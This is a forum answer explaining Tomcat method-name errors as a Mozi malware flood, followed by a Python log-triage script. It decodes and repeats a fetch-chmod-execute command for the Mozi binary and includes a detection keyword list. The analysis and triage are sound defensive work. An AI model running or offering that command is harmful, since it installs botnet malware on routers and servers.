Unrecognized method names crashing springboot sites [closed]

Solution 1:

TL;DR

Your system / router is under attack - it looks like somebody is trying to install "Mozi malware" - see https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot-bots/

Details

Your tomcat is called with something not really being a HTML method. So the caller - whatever it is - does very strange things. It looks like a script is sent instead of an HTTP message.

...After a certain amount of time all of these sites go down...

Looks like a denial of service because of extremely bad network traffic.

Analyze

Let's analyze your output:

java.lang.IllegalArgumentException: Invalid character found in method name [27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$]. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:417) ~[tomcat-embed-core-9.0.39.jar!/:9.0.39]

Reading the implementation we see

// from Http11InputBuffer.java ... (tomcat-embed-core-9.0.48.jar)

    // Avoid unknown protocol triggering an additional error
    request.protocol().setString(Constants.HTTP_11);
    String invalidMethodValue = parseInvalid(parsingRequestLineStart, byteBuffer);
    throw new IllegalArgumentException(sm.getString("iib.invalidmethod", invalidMethodValue));

//...

Having message properties file containing:

iib.invalidmethod=Invalid character found in method name [{0}]. HTTP method names must be tokens

and your given exception, the string {0} is:

27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$

unencoded:

'wget http://%s:%d/Mozi.m -O -> /tmp/Mozi.m;chmod 777  /tmp/Mozi.m;/tmp/Mozi.m dlink.mips $'

Looks like a script is sent which tries to fetch something called "Mozi.m", makes it executable and calls it... oops...

So... doing some simple internet research about "Mozi.m"... I found:

  • https://www.virustotal.com/gui/file/e629334def73be9e166ecdd9d5d73d6be97ef7f7d16f05383892332acb324b73/detection/f-e629334
  • https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot-bots/

So IMO it looks like somebody is attacking the routers with mass HTTP requests, trying to break in. The routers forward the malicious requests and tomcat does handle and reject them (correctly), but with too many requests the system goes down...

Further steps

Consult your cyber security department or consult a security expert and investigate as soon as possible what happened and whether your system was tampered with/hijacked.

IMO those requests should be filtered before tomcat.
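The decoding step in the answer (take the bracketed value {0} from the Tomcat message and percent-decode it) and the closing advice to deal with these requests before they reach Tomcat can be turned into a small log-triage routine that tells you how often the same payload is hitting you. The Python below is an added example and is not part of the answer or of Tomcat; the sample log lines, the indicator list and the function names are constructed for this example (the first log line reproduces the exception text quoted above, the other non-matching line is a made-up benign case of the same exception).

```python
import re
from collections import Counter
from urllib.parse import unquote

# Pattern for the message Tomcat emits when the request line does not start with a
# valid HTTP method token (message key iib.invalidmethod, as quoted in the answer).
INVALID_METHOD_RE = re.compile(
    r"Invalid character found in method name \[(.*)\]\. HTTP method names must be tokens"
)

# Constructed indicator list (assumption): strings a defender would expect in a
# shell-script payload of the kind shown in the post. Extend for your environment.
INDICATORS = ("wget", "curl", "chmod", "/tmp/", "Mozi")

# Constructed sample log excerpt (not from a real server). Line 1 reproduces the
# exception quoted in the answer; line 3 is a constructed non-malicious case of the
# same exception (a client sending non-HTTP bytes to the port); line 4 repeats line 1.
SAMPLE_LOG = """\
java.lang.IllegalArgumentException: Invalid character found in method name [27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$]. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:417)
java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x01]. HTTP method names must be tokens
java.lang.IllegalArgumentException: Invalid character found in method name [27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$]. HTTP method names must be tokens
"""


def extract_invalid_methods(log_text):
    """Return the raw bracketed value {0} from every log line carrying the message."""
    found = []
    for line in log_text.splitlines():
        match = INVALID_METHOD_RE.search(line)
        if match:
            found.append(match.group(1))
    return found


def decode_method(raw):
    """Percent-decode the raw value (%20 -> space, %27 -> ').

    Sequences that are not valid escapes, such as the printf-style %s and %d
    inside the payload, are left untouched by urllib.parse.unquote.
    """
    return unquote(raw)


def find_indicators(decoded):
    """Return the indicators present in the decoded value (case-insensitive)."""
    lowered = decoded.lower()
    return [ind for ind in INDICATORS if ind.lower() in lowered]


def triage(log_text):
    """One record per invalid-method event: raw value, decoded value, indicators hit."""
    records = []
    for raw in extract_invalid_methods(log_text):
        decoded = decode_method(raw)
        records.append(
            {"raw": raw, "decoded": decoded, "indicators": find_indicators(decoded)}
        )
    return records


def summarize(records):
    """Count identical decoded payloads.

    One payload repeated at high volume is the flood the post describes; many
    distinct values with no indicators look more like random scanner noise.
    """
    return Counter(record["decoded"] for record in records)


if __name__ == "__main__":
    recs = triage(SAMPLE_LOG)
    for record in recs:
        tag = "SUSPICIOUS" if record["indicators"] else "noise"
        print(f"{tag:10} {record['decoded']!r} indicators={record['indicators']}")
    for payload, count in summarize(recs).most_common():
        print(f"{count}x {payload!r}")
```

Point it at catalina.out or the Spring Boot application log (replace SAMPLE_LOG with the file contents) and feed the counts into whatever alerting you use; the count of a single repeated payload over time is the number you want when deciding to block the source at the router or reverse proxy rather than letting Tomcat reject each request.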